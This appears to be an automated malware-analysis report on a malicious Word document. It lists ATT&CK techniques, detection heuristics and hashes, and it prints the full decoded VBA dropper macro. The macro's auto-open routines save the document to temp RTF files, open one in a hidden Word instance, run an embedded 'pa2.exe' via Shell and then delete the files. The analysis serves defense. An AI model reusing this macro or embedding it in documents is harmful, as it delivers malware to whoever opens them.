MALICIOUS
574
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1027 Obfuscated Files or Information
The sample contains a VBA macro with AutoOpen and Workbook_Open subroutines that call the Manakai subroutine. Manakai creates two temporary RTF files, executes an embedded PE executable named 'pa2.exe' from the temporary directory, and then deletes the temporary files. The embedded PE executable and the VBA macro's execution of it indicate a downloader or dropper functionality.
Heuristics 18
-
OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILEOLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Hey (2) Shell (TEX) Hey (1) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Hey (2) Set appWord = CreateObject("Word.Application") appWord.Visible = False -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() BQUYHDBHA = "aksd kjahsjkdhdkasjdl kasdjh askdg aksj d" -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Sub Sub Workbook_Open() HUQDHUIQW = "huqw dhqwui hksdjhqwuidhwqidhquwi d hqwduihauigsd" -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
BQUYHDBHA = "aksd kjahsjkdhdkasjdl kasdjh askdg aksj d" Auto_Open End Sub -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
On Error Resume Next TMP = Environ$("TEMP") + "\" TCA = TMP + "199.rtf" -
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1441 bytes |
SHA-256: 54a05fdc3f25498a6f0cd403cf8e780597961c8dab4862e5ee1585eefff4aa70 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub qhdjkashdwd_Open()
End Sub
Sub asdhkjahajks_Open()
BQJAHSD = "asdhjkajs kjdlkasj djahsdjkas"
End Sub
Sub AutoOpen()
BQUYHDBHA = "aksd kjahsjkdhdkasjdl kasdjh askdg aksj d"
Auto_Open
End Sub
Sub Manakai()
On Error Resume Next
TMP = Environ$("TEMP") + "\"
TCA = TMP + "199.rtf"
TCB = TMP + "200.rtf"
TEX = TMP + "pa2.e" + "xe"
SaveAsRTF (TCA)
SaveAsRTF (TCB)
Hey (2)
Set appWord = CreateObject("Word.Application")
appWord.Visible = False
Set docWord = appWord.Documents.Open(TCA)
Hey (2)
Shell (TEX)
Hey (1)
appWord.Quit
Set appWord = Nothing
Kill TCA
Kill TEX
End Sub
Sub Iriada()
NKJASDSD = "askjd asjasj ldkadjkahaksj d"
Manakai
End Sub
Sub Workbook_Open()
HUQDHUIQW = "huqw dhqwui hksdjhqwuidhwqidhquwi d hqwduihauigsd"
Iriada
End Sub
Sub Hey(Kalamana As Long)
Dim Jhbhds As Long
Jhbhds = Timer + Kalamana
Do While Timer < Jhbhds
DoEvents
Loop
End Sub
Public Function SaveAsRTF(Name As String)
ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function
Sub Auto_Open()
Iriada
BHJQWDASD = "ajksdhj aksdasgdhjagskdj "
End Sub
|
|||
embedded_office_0000344a.exe |
embedded-pe | Office MZ+PE at offset 0x344A | 285114 bytes |
SHA-256: 41664da82114b50098c848f3c5fe63e03c7dda49a29cc2b21a1f93aee4e99ebf |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1505225770/Ole10Native | 256704 bytes |
SHA-256: c42b742b1239f0ed56edc9302d7187a504e51dbeb4350730ec2d92c75bd7cc41 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.